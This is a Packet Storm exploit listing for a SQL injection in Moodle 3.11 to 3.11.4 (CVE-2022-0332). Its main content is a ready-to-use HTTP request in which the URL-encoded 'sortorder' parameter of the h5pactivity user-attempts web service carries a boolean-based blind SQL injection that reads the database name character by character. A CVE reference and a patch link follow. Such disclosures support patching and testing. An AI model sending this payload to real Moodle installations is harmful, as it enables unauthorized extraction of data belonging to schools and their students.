Moodle 3.11.4 SQL Injection ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: Moodle 3.11.4  - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC
```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```
```
```
![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")
# Reference
* [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
* [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (76,674)
• Arbitrary^[21] (14,951)
• BBS^[22] (2,859)
• Bypass^[23] (1,518)
• CGI^[24] (1,010)
• Code Execution^[25] (6,485)
• Conference^[26] (667)
• Cracker^[27] (797)
• CSRF^[28] (3,247)
• DoS^[29] (21,558)
• Encryption^[30] (2,320)
• Exploit^[31] (49,178)
• File Inclusion^[32] (4,121)
• File Upload^[33] (933)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,532)
• Intrusion Detection^[36] (845)
• Java^[37] (2,746)
• JavaScript^[38] (790)
• Kernel^[39] (5,907)
• Local^[40] (13,904)
• Magazine^[41] (586)
• Overflow^[42] (12,046)
• Perl^[43] (1,409)
• PHP^[44] (5,026)
• Proof of Concept^[45] (2,273)
• Protocol^[46] (3,238)
• Python^[47] (1,365)
• Remote^[48] (29,350)
• Root^[49] (3,431)
• Ruby^[50] (564)
• Scanner^[51] (1,628)
• Security Tool^[52] (7,635)
• Shell^[53] (3,014)
• Shellcode^[54] (1,192)
• Sniffer^[55] (877)
• Spoof^[56] (2,064)
• SQL Injection^[57] (15,872)
• TCP^[58] (2,345)
• Trojan^[59] (666)
• UDP^[60] (865)
• Virus^[61] (657)
• Vulnerability^[62] (30,166)
• Web^[63] (8,872)
• Whitepaper^[64] (3,701)
• x86^[65] (939)
• XSS^[66] (17,216)
• Other^[67]

File Archives

• February 2022^[68]
• January 2022^[69]
• December 2021^[70]
• November 2021^[71]
• October 2021^[72]
• September 2021^[73]
• August 2021^[74]
• July 2021^[75]
• June 2021^[76]
• May 2021^[77]
• April 2021^[78]
• March 2021^[79]
• Older^[80]

Systems

• AIX^[81] (423)
• Apple^[82] (1,860)
• BSD^[83] (368)
• CentOS^[84] (55)
• Cisco^[85] (1,910)
• Debian^[86] (5,947)
• Fedora^[87] (1,690)
• FreeBSD^[88] (1,241)
• Gentoo^[89] (4,151)
• HPUX^[90] (875)
• iOS^[91] (311)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (67)
• Linux^[95] (41,394)
• Mac OS X^[96] (682)
• Mandriva^[97] (3,105)
• NetBSD^[98] (255)
• OpenBSD^[99] (476)
• RedHat^[100] (10,996)
• Slackware^[101] (941)
• Solaris^[102] (1,601)
• SUSE^[103] (1,444)
• Ubuntu^[104] (7,596)
• UNIX^[105] (9,015)
• UnixWare^[106] (182)
• Windows^[107] (6,268)
• Other^[108]

© 2020 Packet Storm. All rights reserved.